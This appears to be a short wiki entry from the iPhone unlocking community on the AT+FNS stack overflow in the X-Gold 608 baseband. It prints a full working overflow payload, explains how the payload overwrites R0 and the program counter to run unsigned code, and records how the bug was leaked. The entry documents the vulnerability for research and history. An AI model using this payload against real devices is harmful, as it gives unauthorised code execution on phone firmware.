AT+FNS

Credit
Oranav

Exploit
There is a stack overflow in the AT+FNS=0,"..." command, which allows unsigned code execution on the X-Gold 608

AT+FNS="00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000001111112222333344445555666677"

The exploit overwrites R0 and R2 on the stack, and R2 is copied to PC on exit from the routine. Therefore it can be used to overwrite R0 and PC.

Description
Yet another buffer overflow in AT commands, like AT+XLOG and AT+stkprof. Leaked by NitroKey who somehow intercepted the information and pastied it with hashes shortly after Oranav had disclosed it to the iPhone Dev Team.